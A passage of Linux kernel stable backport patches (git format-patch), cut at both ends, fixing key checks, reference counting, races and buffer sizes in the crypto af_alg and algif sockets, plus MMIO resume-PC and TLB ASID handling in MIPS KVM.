+ struct algif_hash_tfm *tfm = private; + struct crypto_ahash *hash = tfm->hash; + unsigned len = sizeof(*ctx) + crypto_ahash_reqsize(hash); + unsigned ds = crypto_ahash_digestsize(hash); ctx = sock_kmalloc(sk, len, GFP_KERNEL); if (!ctx) @@ -299,7 +458,7 @@ static int hash_accept_parent(void *private, struct sock *sk) ask->private = ctx; - ahash_request_set_tfm(&ctx->req, private); + ahash_request_set_tfm(&ctx->req, hash); ahash_request_set_callback(&ctx->req, CRYPTO_TFM_REQ_MAY_BACKLOG, af_alg_complete, &ctx->completion); @@ -308,12 +467,38 @@ static int hash_accept_parent(void *private, struct sock *sk) return 0; } +static int hash_accept_parent(void *private, struct sock *sk) +{ + struct algif_hash_tfm *tfm = private; + + if (!tfm->has_key && crypto_ahash_has_setkey(tfm->hash)) + return -ENOKEY; + + return hash_accept_parent_common(private, sk); +} + +static int hash_accept_parent_nokey(void *private, struct sock *sk) +{ + int err; + + err = hash_accept_parent_common(private, sk); + if (err) + goto out; + + sk->sk_destruct = hash_sock_destruct_nokey; + +out: + return err; +} + static const struct af_alg_type algif_type_hash = { .bind = hash_bind, .release = hash_release, .setkey = hash_setkey, .accept = hash_accept_parent, + .accept_nokey = hash_accept_parent_nokey, .ops = &algif_hash_ops, + .ops_nokey = &algif_hash_ops_nokey, .name = "hash", .owner = THIS_MODULE }; From 16d4044862642265bfaf5dc909e4c19ce595595b Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:40 +0300 Subject: [PATCH 010/315] crypto: skcipher - Add crypto_skcipher_has_setkey commit a1383cd86a062fc798899ab20f0ec2116cce39cb upstream. This patch adds a way for skcipher users to determine whether a key is required by a transform. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/ablkcipher.c | 2 ++ crypto/blkcipher.c | 1 + include/linux/crypto.h | 8 ++++++++ 3 files changed, 11 insertions(+) diff --git a/crypto/ablkcipher.c b/crypto/ablkcipher.c index ebcec7439a1..2b6dd740163 100644 --- a/crypto/ablkcipher.c +++ b/crypto/ablkcipher.c @@ -379,6 +379,7 @@ static int crypto_init_ablkcipher_ops(struct crypto_tfm *tfm, u32 type, } crt->base = __crypto_ablkcipher_cast(tfm); crt->ivsize = alg->ivsize; + crt->has_setkey = alg->max_keysize; return 0; } @@ -460,6 +461,7 @@ static int crypto_init_givcipher_ops(struct crypto_tfm *tfm, u32 type, crt->givdecrypt = alg->givdecrypt ?: no_givdecrypt; crt->base = __crypto_ablkcipher_cast(tfm); crt->ivsize = alg->ivsize; + crt->has_setkey = alg->max_keysize; return 0; } diff --git a/crypto/blkcipher.c b/crypto/blkcipher.c index a79e7e9ab86..37af08e727c 100644 --- a/crypto/blkcipher.c +++ b/crypto/blkcipher.c @@ -458,6 +458,7 @@ static int crypto_init_blkcipher_ops_async(struct crypto_tfm *tfm) } crt->base = __crypto_ablkcipher_cast(tfm); crt->ivsize = alg->ivsize; + crt->has_setkey = alg->max_keysize; return 0; } diff --git a/include/linux/crypto.h b/include/linux/crypto.h index 2b00d92a6e6..61dd0b15d21 100644 --- a/include/linux/crypto.h +++ b/include/linux/crypto.h @@ -354,6 +354,7 @@ struct ablkcipher_tfm { unsigned int ivsize; unsigned int reqsize; + bool has_setkey; }; struct aead_tfm { @@ -664,6 +665,13 @@ static inline int crypto_ablkcipher_setkey(struct crypto_ablkcipher *tfm, return crt->setkey(crt->base, key, keylen); } +static inline bool crypto_ablkcipher_has_setkey(struct crypto_ablkcipher *tfm) +{ + struct ablkcipher_tfm *crt = crypto_ablkcipher_crt(tfm); + + return crt->has_setkey; +} + static inline struct crypto_ablkcipher *crypto_ablkcipher_reqtfm( struct ablkcipher_request *req) { From b5b7b2f8996df549b7de37c26e685a92fb54a7f4 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:41 +0300 Subject: [PATCH 011/315] crypto: algif_skcipher - Add key check exception for cipher_null commit 6e8d8ecf438792ecf7a3207488fb4eebc4edb040 upstream. This patch adds an exception to the key check so that cipher_null users may continue to use algif_skcipher without setting a key. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_skcipher.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crypto/algif_skcipher.c b/crypto/algif_skcipher.c index db5f0f0090e..4677a45ec8c 100644 --- a/crypto/algif_skcipher.c +++ b/crypto/algif_skcipher.c @@ -759,7 +759,7 @@ static int skcipher_accept_parent(void *private, struct sock *sk) { struct skcipher_tfm *tfm = private; - if (!tfm->has_key) + if (!tfm->has_key && crypto_ablkcipher_has_setkey(tfm->skcipher)) return -ENOKEY; return skcipher_accept_parent_common(private, sk); From 61d058312316a3b823b75b0471de92e636a0d651 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:42 +0300 Subject: [PATCH 012/315] crypto: af_alg - Allow af_af_alg_release_parent to be called on nokey path commit 6a935170a980024dd29199e9dbb5c4da4767a1b9 upstream. This patch allows af_alg_release_parent to be called even for nokey sockets. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/af_alg.c | 9 ++++++++- include/crypto/if_alg.h | 1 + 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/crypto/af_alg.c b/crypto/af_alg.c index de130c24a64..2f8fd8441f3 100644 --- a/crypto/af_alg.c +++ b/crypto/af_alg.c @@ -133,6 +133,12 @@ void af_alg_release_parent(struct sock *sk) bool last; sk = ask->parent; + + if (ask->nokey_refcnt && !ask->refcnt) { + sock_put(sk); + return; + } + ask = alg_sk(sk); lock_sock(sk); @@ -258,8 +264,8 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) struct alg_sock *ask = alg_sk(sk); const struct af_alg_type *type; struct sock *sk2; + unsigned int nokey; int err; - bool nokey; lock_sock(sk); type = ask->type; @@ -292,6 +298,7 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) sock_hold(sk); alg_sk(sk2)->parent = sk; alg_sk(sk2)->type = type; + alg_sk(sk2)->nokey_refcnt = nokey; newsock->ops = type->ops; newsock->state = SS_CONNECTED; diff --git a/include/crypto/if_alg.h b/include/crypto/if_alg.h index 9e6a2f38c52..bfefd8139e1 100644 --- a/include/crypto/if_alg.h +++ b/include/crypto/if_alg.h @@ -31,6 +31,7 @@ struct alg_sock { struct sock *parent; unsigned int refcnt; + unsigned int nokey_refcnt; const struct af_alg_type *type; void *private; From 023fe7ba69b80cb348d7ff9713c9ee2175d0ae49 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:43 +0300 Subject: [PATCH 013/315] crypto: algif_hash - Remove custom release parent function commit f1d84af1835846a5a2b827382c5848faf2bb0e75 upstream. This patch removes the custom release parent function as the generic af_alg_release_parent now works for nokey sockets too. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_hash.c | 43 +++---------------------------------------- 1 file changed, 3 insertions(+), 40 deletions(-) diff --git a/crypto/algif_hash.c b/crypto/algif_hash.c index 7bc3f89fffb..512aa36274e 100644 --- a/crypto/algif_hash.c +++ b/crypto/algif_hash.c @@ -397,7 +397,7 @@ static int hash_setkey(void *private, const u8 *key, unsigned int keylen) return err; } -static void hash_sock_destruct_common(struct sock *sk) +static void hash_sock_destruct(struct sock *sk) { struct alg_sock *ask = alg_sk(sk); struct hash_ctx *ctx = ask->private; @@ -405,33 +405,10 @@ static void hash_sock_destruct_common(struct sock *sk) sock_kfree_s(sk, ctx->result, crypto_ahash_digestsize(crypto_ahash_reqtfm(&ctx->req))); sock_kfree_s(sk, ctx, ctx->len); -} - -static void hash_sock_destruct(struct sock *sk) -{ - hash_sock_destruct_common(sk); af_alg_release_parent(sk); } -static void hash_release_parent_nokey(struct sock *sk) -{ - struct alg_sock *ask = alg_sk(sk); - - if (!ask->refcnt) { - sock_put(ask->parent); - return; - } - - af_alg_release_parent(sk); -} - -static void hash_sock_destruct_nokey(struct sock *sk) -{ - hash_sock_destruct_common(sk); - hash_release_parent_nokey(sk); -} - -static int hash_accept_parent_common(void *private, struct sock *sk) +static int hash_accept_parent_nokey(void *private, struct sock *sk) { struct hash_ctx *ctx; struct alg_sock *ask = alg_sk(sk); @@ -474,21 +451,7 @@ static int hash_accept_parent(void *private, struct sock *sk) if (!tfm->has_key && crypto_ahash_has_setkey(tfm->hash)) return -ENOKEY; - return hash_accept_parent_common(private, sk); -} - -static int hash_accept_parent_nokey(void *private, struct sock *sk) -{ - int err; - - err = hash_accept_parent_common(private, sk); - if (err) - goto out; - - sk->sk_destruct = hash_sock_destruct_nokey; - -out: - return err; + return hash_accept_parent_nokey(private, sk); } static const struct af_alg_type algif_type_hash = { From 92954970134d3d114a0af92876743db1d98b6ab4 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:44 +0300 Subject: [PATCH 014/315] crypto: algif_skcipher - Remove custom release parent function commit d7b65aee1e7b4c87922b0232eaba56a8a143a4a0 upstream. This patch removes the custom release parent function as the generic af_alg_release_parent now works for nokey sockets too. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_skcipher.c | 43 +++-------------------------------------- 1 file changed, 3 insertions(+), 40 deletions(-) diff --git a/crypto/algif_skcipher.c b/crypto/algif_skcipher.c index 4677a45ec8c..a7800b7b0f3 100644 --- a/crypto/algif_skcipher.c +++ b/crypto/algif_skcipher.c @@ -681,7 +681,7 @@ static int skcipher_setkey(void *private, const u8 *key, unsigned int keylen) return err; } -static void skcipher_sock_destruct_common(struct sock *sk) +static void skcipher_sock_destruct(struct sock *sk) { struct alg_sock *ask = alg_sk(sk); struct skcipher_ctx *ctx = ask->private; @@ -690,33 +690,10 @@ static void skcipher_sock_destruct_common(struct sock *sk) skcipher_free_sgl(sk); sock_kfree_s(sk, ctx->iv, crypto_ablkcipher_ivsize(tfm)); sock_kfree_s(sk, ctx, ctx->len); -} - -static void skcipher_sock_destruct(struct sock *sk) -{ - skcipher_sock_destruct_common(sk); af_alg_release_parent(sk); } -static void skcipher_release_parent_nokey(struct sock *sk) -{ - struct alg_sock *ask = alg_sk(sk); - - if (!ask->refcnt) { - sock_put(ask->parent); - return; - } - - af_alg_release_parent(sk); -} - -static void skcipher_sock_destruct_nokey(struct sock *sk) -{ - skcipher_sock_destruct_common(sk); - skcipher_release_parent_nokey(sk); -} - -static int skcipher_accept_parent_common(void *private, struct sock *sk) +static int skcipher_accept_parent_nokey(void *private, struct sock *sk) { struct skcipher_ctx *ctx; struct alg_sock *ask = alg_sk(sk); @@ -762,21 +739,7 @@ static int skcipher_accept_parent(void *private, struct sock *sk) if (!tfm->has_key && crypto_ablkcipher_has_setkey(tfm->skcipher)) return -ENOKEY; - return skcipher_accept_parent_common(private, sk); -} - -static int skcipher_accept_parent_nokey(void *private, struct sock *sk) -{ - int err; - - err = skcipher_accept_parent_common(private, sk); - if (err) - goto out; - - sk->sk_destruct = skcipher_sock_destruct_nokey; - -out: - return err; + return skcipher_accept_parent_nokey(private, sk); } static const struct af_alg_type algif_type_skcipher = { From fb0b50cf872a56be4e216d0ec8a1ff506ff879d9 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:45 +0300 Subject: [PATCH 015/315] crypto: af_alg - Forbid bind(2) when nokey child sockets are present commit a6a48c565f6f112c6983e2a02b1602189ed6e26e upstream. This patch forbids the calling of bind(2) when there are child sockets created by accept(2) in existence, even if they are created on the nokey path. This is needed as those child sockets have references to the tfm object which bind(2) will destroy. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/af_alg.c | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/crypto/af_alg.c b/crypto/af_alg.c index 2f8fd8441f3..68ec1ac4104 100644 --- a/crypto/af_alg.c +++ b/crypto/af_alg.c @@ -130,19 +130,16 @@ EXPORT_SYMBOL_GPL(af_alg_release); void af_alg_release_parent(struct sock *sk) { struct alg_sock *ask = alg_sk(sk); - bool last; + unsigned int nokey = ask->nokey_refcnt; + bool last = nokey && !ask->refcnt; sk = ask->parent; - - if (ask->nokey_refcnt && !ask->refcnt) { - sock_put(sk); - return; - } - ask = alg_sk(sk); lock_sock(sk); - last = !--ask->refcnt; + ask->nokey_refcnt -= nokey; + if (!last) + last = !--ask->refcnt; release_sock(sk); if (last) @@ -185,7 +182,7 @@ static int alg_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) err = -EBUSY; lock_sock(sk); - if (ask->refcnt) + if (ask->refcnt | ask->nokey_refcnt) goto unlock; swap(ask->type, type); @@ -296,6 +293,7 @@ int af_alg_accept(struct sock *sk, struct socket *newsock) if (nokey || !ask->refcnt++) sock_hold(sk); + ask->nokey_refcnt += nokey; alg_sk(sk2)->parent = sk; alg_sk(sk2)->type = type; alg_sk(sk2)->nokey_refcnt = nokey; From 54541dc3cef16ceca14c490a84d66073f1c2aa61 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:46 +0300 Subject: [PATCH 016/315] crypto: algif_hash - Fix race condition in hash_check_key commit ad46d7e33219218605ea619e32553daf4f346b9f upstream. We need to lock the child socket in hash_check_key as otherwise two simultaneous calls can cause the parent socket to be freed. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_hash.c | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/crypto/algif_hash.c b/crypto/algif_hash.c index 512aa36274e..d11d431251f 100644 --- a/crypto/algif_hash.c +++ b/crypto/algif_hash.c @@ -255,22 +255,23 @@ static struct proto_ops algif_hash_ops = { static int hash_check_key(struct socket *sock) { - int err; + int err = 0; struct sock *psk; struct alg_sock *pask; struct algif_hash_tfm *tfm; struct sock *sk = sock->sk; struct alg_sock *ask = alg_sk(sk); + lock_sock(sk); if (ask->refcnt) - return 0; + goto unlock_child; psk = ask->parent; pask = alg_sk(ask->parent); tfm = pask->private; err = -ENOKEY; - lock_sock(psk); + lock_sock_nested(psk, SINGLE_DEPTH_NESTING); if (!tfm->has_key) goto unlock; @@ -284,6 +285,8 @@ static int hash_check_key(struct socket *sock) unlock: release_sock(psk); +unlock_child: + release_sock(sk); return err; } From 0ac80b6efdb892ce140ff4a484c318be11ea8c07 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:47 +0300 Subject: [PATCH 017/315] crypto: algif_skcipher - Fix race condition in skcipher_check_key commit 1822793a523e5d5730b19cc21160ff1717421bc8 upstream. We need to lock the child socket in skcipher_check_key as otherwise two simultaneous calls can cause the parent socket to be freed. Cc: stable@vger.kernel.org Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_skcipher.c | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/crypto/algif_skcipher.c b/crypto/algif_skcipher.c index a7800b7b0f3..13fd26e23ca 100644 --- a/crypto/algif_skcipher.c +++ b/crypto/algif_skcipher.c @@ -551,22 +551,23 @@ static struct proto_ops algif_skcipher_ops = { static int skcipher_check_key(struct socket *sock) { - int err; + int err = 0; struct sock *psk; struct alg_sock *pask; struct skcipher_tfm *tfm; struct sock *sk = sock->sk; struct alg_sock *ask = alg_sk(sk); + lock_sock(sk); if (ask->refcnt) - return 0; + goto unlock_child; psk = ask->parent; pask = alg_sk(ask->parent); tfm = pask->private; err = -ENOKEY; - lock_sock(psk); + lock_sock_nested(psk, SINGLE_DEPTH_NESTING); if (!tfm->has_key) goto unlock; @@ -580,6 +581,8 @@ static int skcipher_check_key(struct socket *sock) unlock: release_sock(psk); +unlock_child: + release_sock(sk); return err; } From ca46046c55cb4766cf7fc1a72ac2efe2e1da89d9 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:48 +0300 Subject: [PATCH 018/315] crypto: algif_skcipher - Load TX SG list after waiting commit 4f0414e54e4d1893c6f08260693f8ef84c929293 upstream. We need to load the TX SG list in sendmsg(2) after waiting for incoming data, not before. Cc: stable@vger.kernel.org Reported-by: Dmitry Vyukov Signed-off-by: Herbert Xu Tested-by: Dmitry Vyukov Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/algif_skcipher.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/crypto/algif_skcipher.c b/crypto/algif_skcipher.c index 13fd26e23ca..ea05c531db2 100644 --- a/crypto/algif_skcipher.c +++ b/crypto/algif_skcipher.c @@ -446,13 +446,6 @@ static int skcipher_recvmsg(struct kiocb *unused, struct socket *sock, char __user *from = iov->iov_base; while (seglen) { - sgl = list_first_entry(&ctx->tsgl, - struct skcipher_sg_list, list); - sg = sgl->sg; - - while (!sg->length) - sg++; - used = ctx->used; if (!used) { err = skcipher_wait_for_data(sk, flags); @@ -474,6 +467,13 @@ static int skcipher_recvmsg(struct kiocb *unused, struct socket *sock, if (!used) goto free; + sgl = list_first_entry(&ctx->tsgl, + struct skcipher_sg_list, list); + sg = sgl->sg; + + while (!sg->length) + sg++; + ablkcipher_request_set_crypt(&ctx->req, sg, ctx->rsgl.sg, used, ctx->iv); From 6ff69ad9e2a6629699075801e2cfc432359f88cc Mon Sep 17 00:00:00 2001 From: Ard Biesheuvel Date: Thu, 27 Oct 2016 17:29:50 +0300 Subject: [PATCH 019/315] crypto: cryptd - initialize child shash_desc on import commit 0bd2223594a4dcddc1e34b15774a3a4776f7749e upstream. When calling .import() on a cryptd ahash_request, the structure members that describe the child transform in the shash_desc need to be initialized like they are when calling .init() Cc: stable@vger.kernel.org Signed-off-by: Ard Biesheuvel Signed-off-by: Herbert Xu Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/cryptd.c | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/crypto/cryptd.c b/crypto/cryptd.c index 75c415d3708..d85fab97551 100644 --- a/crypto/cryptd.c +++ b/crypto/cryptd.c @@ -565,9 +565,14 @@ static int cryptd_hash_export(struct ahash_request *req, void *out) static int cryptd_hash_import(struct ahash_request *req, const void *in) { - struct cryptd_hash_request_ctx *rctx = ahash_request_ctx(req); + struct crypto_ahash *tfm = crypto_ahash_reqtfm(req); + struct cryptd_hash_ctx *ctx = crypto_ahash_ctx(tfm); + struct shash_desc *desc = cryptd_shash_desc(req); - return crypto_shash_import(&rctx->desc, in); + desc->tfm = ctx->child; + desc->flags = req->base.flags; + + return crypto_shash_import(desc, in); } static int cryptd_create_hash(struct crypto_template *tmpl, struct rtattr **tb, From 0b3918fc435003b491155ca5418a9cdbedd15a92 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 27 Oct 2016 17:29:51 +0300 Subject: [PATCH 020/315] crypto: skcipher - Fix blkcipher walk OOM crash commit acdb04d0b36769b3e05990c488dc74d8b7ac8060 upstream. When we need to allocate a temporary blkcipher_walk_next and it fails, the code is supposed to take the slow path of processing the data block by block. However, due to an unrelated change we instead end up dereferencing the NULL pointer. This patch fixes it by moving the unrelated bsize setting out of the way so that we enter the slow path as inteded. Fixes: 7607bd8ff03b ("[CRYPTO] blkcipher: Added blkcipher_walk_virt_block") Cc: stable@vger.kernel.org Reported-by: xiakaixu Reported-by: Ard Biesheuvel Signed-off-by: Herbert Xu Tested-by: Ard Biesheuvel Signed-off-by: Andrey Ryabinin Signed-off-by: Willy Tarreau --- crypto/blkcipher.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/crypto/blkcipher.c b/crypto/blkcipher.c index 37af08e727c..39b09f25e3f 100644 --- a/crypto/blkcipher.c +++ b/crypto/blkcipher.c @@ -238,6 +238,8 @@ static int blkcipher_walk_next(struct blkcipher_desc *desc, return blkcipher_walk_done(desc, walk, -EINVAL); } + bsize = min(walk->blocksize, n); + walk->flags &= ~(BLKCIPHER_WALK_SLOW | BLKCIPHER_WALK_COPY | BLKCIPHER_WALK_DIFF); if (!scatterwalk_aligned(&walk->in, alignmask) || @@ -250,7 +252,6 @@ static int blkcipher_walk_next(struct blkcipher_desc *desc, } } - bsize = min(walk->blocksize, n); n = scatterwalk_clamp(&walk->in, n); n = scatterwalk_clamp(&walk->out, n); From 4d57910eab3ab49d9b4f4762b6f7c0e8c0a3681f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ondrej=20Mosn=C3=83=C2=A1=C3=84=C2=8Dek?= Date: Fri, 23 Sep 2016 10:47:32 +0200 Subject: [PATCH 021/315] crypto: gcm - Fix IV buffer size in crypto_gcm_setkey commit 50d2e6dc1f83db0563c7d6603967bf9585ce934b upstream. The cipher block size for GCM is 16 bytes, and thus the CTR transform used in crypto_gcm_setkey() will also expect a 16-byte IV. However, the code currently reserves only 8 bytes for the IV, causing an out-of-bounds access in the CTR transform. This patch fixes the issue by setting the size of the IV buffer to 16 bytes. Fixes: 84c911523020 ("[CRYPTO] gcm: Add support for async ciphers") Signed-off-by: Ondrej Mosnacek Signed-off-by: Herbert Xu Signed-off-by: Willy Tarreau --- crypto/gcm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crypto/gcm.c b/crypto/gcm.c index 451e420ce56..a1ec756b843 100644 --- a/crypto/gcm.c +++ b/crypto/gcm.c @@ -109,7 +109,7 @@ static int crypto_gcm_setkey(struct crypto_aead *aead, const u8 *key, struct crypto_ablkcipher *ctr = ctx->ctr; struct { be128 hash; - u8 iv[8]; + u8 iv[16]; struct crypto_gcm_setkey_result result; From 63b0fa17068ad4bc438699934bbd73e61b184cce Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Wed, 9 Nov 2016 16:13:49 +0000 Subject: [PATCH 022/315] MIPS: KVM: Fix unused variable build warning commit 5f508c43a7648baa892528922402f1e13f258bd4 upstream. As kvm_mips_complete_mmio_load() did not yet modify PC at this point as James Hogans explained the curr_pc variable and the comments along with it can be dropped. Signed-off-by: Nicholas Mc Guire Link: http://lkml.org/lkml/2015/5/8/422 Cc: Gleb Natapov Cc: Paolo Bonzini Cc: James Hogan Cc: kvm@vger.kernel.org Cc: linux-mips@linux-mips.org Cc: linux-kernel@vger.kernel.org Patchwork: https://patchwork.linux-mips.org/patch/9993/ Signed-off-by: Ralf Baechle [james.hogan@imgtec.com: Backport to 3.10..3.16] Signed-off-by: James Hogan Signed-off-by: Willy Tarreau --- arch/mips/kvm/kvm_mips_emul.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/arch/mips/kvm/kvm_mips_emul.c b/arch/mips/kvm/kvm_mips_emul.c index 9f7643874fb..5c2d70bd7ce 100644 --- a/arch/mips/kvm/kvm_mips_emul.c +++ b/arch/mips/kvm/kvm_mips_emul.c @@ -1610,7 +1610,6 @@ kvm_mips_complete_mmio_load(struct kvm_vcpu *vcpu, struct kvm_run *run) { unsigned long *gpr = &vcpu->arch.gprs[vcpu->arch.io_gpr]; enum emulation_result er = EMULATE_DONE; - unsigned long curr_pc; if (run->mmio.len > sizeof(*gpr)) { printk("Bad MMIO length: %d", run->mmio.len); @@ -1618,11 +1617,6 @@ kvm_mips_complete_mmio_load(struct kvm_vcpu *vcpu, struct kvm_run *run) goto done; } - /* - * Update PC and hold onto current PC in case there is - * an error and we want to rollback the PC - */ - curr_pc = vcpu->arch.pc; er = update_pc(vcpu, vcpu->arch.pending_load_cause); if (er == EMULATE_FAIL) return er; From 1d3b3d31763daa35941c90c588db9de8d5a4d173 Mon Sep 17 00:00:00 2001 From: James Hogan Date: Wed, 9 Nov 2016 16:13:50 +0000 Subject: [PATCH 023/315] KVM: MIPS: Precalculate MMIO load resume PC MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit e1e575f6b026734be3b1f075e780e91ab08ca541 upstream. The advancing of the PC when completing an MMIO load is done before re-entering the guest, i.e. before restoring the guest ASID. However if the load is in a branch delay slot it may need to access guest code to read the prior branch instruction. This isn't safe in TLB mapped code at the moment, nor in the future when we'll access unmapped guest segments using direct user accessors too, as it could read the branch from host user memory instead. Therefore calculate the resume PC in advance while we're still in the right context and save it in the new vcpu->arch.io_pc (replacing the no longer needed vcpu->arch.pending_load_cause), and restore it on MMIO completion. Fixes: e685c689f3a8 ("KVM/MIPS32: Privileged instruction/target branch emulation.") Signed-off-by: James Hogan Cc: Paolo Bonzini Cc: "Radim Krčmář Cc: Ralf Baechle Cc: linux-mips@linux-mips.org Cc: kvm@vger.kernel.org Cc: # 3.10.x-3.16.x: 5f508c43a764: MIPS: KVM: Fix unused variable build warning Cc: # 3.10.x-3.16.x Signed-off-by: Paolo Bonzini [james.hogan@imgtec.com: Backport to 3.10..3.16] Signed-off-by: James Hogan Signed-off-by: Willy Tarreau --- arch/mips/include/asm/kvm_host.h | 7 ++++--- arch/mips/kvm/kvm_mips_emul.c | 25 +++++++++++++++---------- 2 files changed, 19 insertions(+), 13 deletions(-) diff --git a/arch/mips/include/asm/kvm_host.h b/arch/mips/include/asm/kvm_host.h index 883a162083a..05863e3ee2e 100644 --- a/arch/mips/include/asm/kvm_host.h +++ b/arch/mips/include/asm/kvm_host.h @@ -375,7 +375,10 @@ struct kvm_vcpu_arch { /* Host KSEG0 address of the EI/DI offset */ void *kseg0_commpage; - u32 io_gpr; /* GPR used as IO source/target */ + /* Resume PC after MMIO completion */ + unsigned long io_pc; + /* GPR used as IO source/target */ + u32 io_gpr; /* Used to calibrate the virutal count register for the guest */ int32_t host_cp0_count; @@ -386,8 +389,6 @@ struct kvm_vcpu_arch { /* Bitmask of pending exceptions to be cleared */ unsigned long pending_exceptions_clr; - unsigned long pending_load_cause; - /* Save/Restore the entryhi register when are are preempted/scheduled back in */ unsigned long preempt_entryhi; diff --git a/arch/mips/kvm/kvm_mips_emul.c b/arch/mips/kvm/kvm_mips_emul.c index 5c2d70bd7ce..e5977f2c9d3 100644 --- a/arch/mips/kvm/kvm_mips_emul.c +++ b/arch/mips/kvm/kvm_mips_emul.c @@ -773,6 +773,7 @@ kvm_mips_emulate_load(uint32_t inst, uint32_t cause, struct kvm_run *run, struct kvm_vcpu *vcpu) { enum emulation_result er = EMULATE_DO_MMIO; + unsigned long curr_pc; int32_t op, base, rt, offset; uint32_t bytes; @@ -781,7 +782,18 @@ kvm_mips_emulate_load(uint32_t inst, uint32_t cause, offset = inst & 0xffff; op = (inst >> 26) & 0x3f; - vcpu->arch.pending_load_cause = cause; + /* + * Find the resume PC now while we have safe and easy access to the + * prior branch instruction, and save it for + * kvm_mips_complete_mmio_load() to restore later. + */ + curr_pc = vcpu->arch.pc; + er = update_pc(vcpu, cause); + if (er == EMULATE_FAIL) + return er; + vcpu->arch.io_pc = vcpu->arch.pc; + vcpu->arch.pc = curr_pc; + vcpu->arch.io_gpr = rt; switch (op) { @@ -1617,9 +1629,8 @@ kvm_mips_complete_mmio_load(struct kvm_vcpu *vcpu, struct kvm_run *run) goto done; } - er = update_pc(vcpu, vcpu->arch.pending_load_cause); - if (er == EMULATE_FAIL) - return er; + /* Restore saved resume PC */ + vcpu->arch.pc = vcpu->arch.io_pc; switch (run->mmio.len) { case 4: @@ -1641,12 +1652,6 @@ kvm_mips_complete_mmio_load(struct kvm_vcpu *vcpu, struct kvm_run *run) break; } - if (vcpu->arch.pending_load_cause & CAUSEF_BD) - kvm_debug - ("[%#lx] Completing %d byte BD Load to gpr %d (0x%08lx) type %d\n", - vcpu->arch.pc, run->mmio.len, vcpu->arch.io_gpr, *gpr, - vcpu->mmio_needed); - done: return er; } From 4c7055f88a19c37991c2ba912e63cd466594f63c Mon Sep 17 00:00:00 2001 From: James Hogan Date: Wed, 9 Nov 2016 14:46:24 +0000 Subject: [PATCH 024/315] KVM: MIPS: Drop other CPU ASIDs on guest MMU changes MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 91e4f1b6073dd680d86cdb7e42d7cccca9db39d8 upstream. When a guest TLB entry is replaced by TLBWI or TLBWR, we only invalidate TLB entries on the local CPU. This doesn't work correctly on an SMP host when the guest is migrated to a different physical CPU, as it could pick up stale TLB mappings from the last time the vCPU ran on that physical CPU. Therefore invalidate both user and kernel host ASIDs on other CPUs, which will cause new ASIDs to be generated when it next runs on those CPUs. We're careful only to do this if the TLB entry was already valid, and only for the kernel ASID where the virtual address it mapped is outside of the guest user address range. Signed-off-by: James Hogan Cc: Paolo Bonzini Cc: "Radim Krčmář" Cc: Ralf Baechle Cc: linux-mips@linux-mips.org Cc: kvm@vger.kernel.org Cc: # 3.10.x- Cc: Jiri Slaby [james.hogan@imgtec.com: Backport to 3.10..3.16] Signed-off-by: James Hogan Signed-off-by: Willy Tarreau --- arch/mips/kvm/kvm_mips_emul.c | 61 ++++++++++++++++++++++++++++++----- 1 file changed, 53 insertions(+), 8 deletions(-) diff --git a/arch/mips/kvm/kvm_mips_emul.c b/arch/mips/kvm/kvm_mips_emul.c index e5977f2c9d3..4cfb5bddaa9 100644 --- a/arch/mips/kvm/kvm_mips_emul.c +++ b/arch/mips/kvm/kvm_mips_emul.c @@ -310,6 +310,47 @@ enum emulation_result kvm_mips_emul_tlbr(struct kvm_vcpu *vcpu) return er; } +/** + * 